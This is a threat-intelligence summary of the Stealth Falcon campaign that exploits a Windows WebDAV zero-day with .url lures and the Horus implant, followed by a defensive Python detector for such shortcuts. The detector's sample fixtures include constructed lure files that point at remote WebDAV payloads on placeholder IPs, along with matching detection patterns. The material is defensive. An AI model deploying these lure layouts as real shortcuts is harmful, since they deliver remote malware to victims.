A sophisticated cyberespionage campaign attributed to Stealth Falcon exploits a zero-day vulnerability (CVE-2025-33053) in Microsoft Windows WebDAV to infiltrate defense organizations in the Middle East and Africa. The attackers used malicious .url files, custom malware loaders, and a C++ implant called Horus, with advanced obfuscation and stealth techniques. #StealthFalcon #CVE-2025-33053
Key points
- The campaign exploits a zero-day vulnerability in Windows WebDAV to execute remote code.
- Stealth Falcon uses malicious .url files to redirect the execution of a legitimate system binary to malware hosted on WebDAV servers.
- The Horus Loader employs obfuscation, anti-debugging, and memory injection techniques to hide its payload.
- The Horus Agent is a C++ implant built on the Mythic C2 framework, supporting stealthy commands such as data exfiltration and system surveying.
- The targets are primarily government and military entities in the Middle East and Africa, especially in Turkey, Qatar, Egypt, and Yemen.
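As an added triage example (not code from the report or from Stealth Falcon's tooling), a small Python script that parses .url shortcut files and flags the pairing the key points describe: a local system binary as the shortcut target combined with a WebDAV location in one of the shortcut's path fields. The INI field names checked, the WebDAV UNC forms, the placeholder binary name and the sample files are assumptions or constructed values; the page does not say which binary or fields the real lures used.

```python
"""Flag Windows .url (InternetShortcut) files that pair a local executable with a
WebDAV location. Added example; field usage and samples are assumptions."""
import configparser
import re
from typing import Dict, List

# Windows WebDAV mini-redirector UNC forms: \\host@SSL\..., \\host@8080\..., \\host\DavWWWRoot\...
_WEBDAV_UNC = re.compile(r"^\\\\[^\\]+(@ssl|@\d{1,5})\\", re.IGNORECASE)
_LOCAL_EXE = re.compile(r"^(file:///)?[a-z]:[\\/].*\.(exe|dll|cmd|bat|msi)$", re.IGNORECASE)
# Assumption: shortcut fields that can steer where a launched binary resolves files from.
_PATH_FIELDS = ("workingdirectory", "iconfile")

# Constructed samples (placeholder binary name, documentation-range IPs).
SAMPLES: Dict[str, str] = {
    "benign.url": "[InternetShortcut]\nURL=https://example.com/\n",
    "lure.url": r"""[InternetShortcut]
URL=file:///C:/Windows/System32/placeholder.exe
WorkingDirectory=\\203.0.113.10@80\DavWWWRoot\share
""",
    "direct.url": "[InternetShortcut]\nURL=" + r"\\198.51.100.7@SSL\DavWWWRoot\payload.exe" + "\n",
}


def is_webdav_location(value: str) -> bool:
    """True for http(s) URLs and WebDAV-style UNC paths (@SSL, @port or DavWWWRoot)."""
    v = value.strip()
    if v.lower().startswith(("http://", "https://")) or _WEBDAV_UNC.match(v):
        return True
    return "\\davwwwroot\\" in (v.lower() + "\\")


def assess_url_file(contents: str) -> List[str]:
    """Return findings for one .url file; an empty list means nothing looked odd."""
    parser = configparser.ConfigParser(interpolation=None)
    try:
        parser.read_string(contents)
    except configparser.Error as exc:
        return [f"unparseable shortcut: {exc}"]
    if not parser.has_section("InternetShortcut"):
        return ["missing [InternetShortcut] section"]
    section = parser["InternetShortcut"]  # configparser lower-cases option names
    findings: List[str] = []
    url = section.get("url", "").strip()
    if _WEBDAV_UNC.match(url) or "davwwwroot" in url.lower():
        findings.append(f"shortcut target is a WebDAV UNC path: {url}")
    if _LOCAL_EXE.match(url):  # local binary as target: check where it will run from
        for field in _PATH_FIELDS:
            value = section.get(field, "")
            if value and is_webdav_location(value):
                findings.append(f"local executable {url} with {field} on WebDAV: {value.strip()}")
    return findings


def scan(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Assess every sample and keep only the ones with findings."""
    return {name: f for name, f in ((n, assess_url_file(c)) for n, c in files.items()) if f}
```

Running `scan(SAMPLES)` reports `lure.url` and `direct.url` and stays silent on the benign shortcut; the same checks apply to shortcuts collected from mail attachments or user profiles.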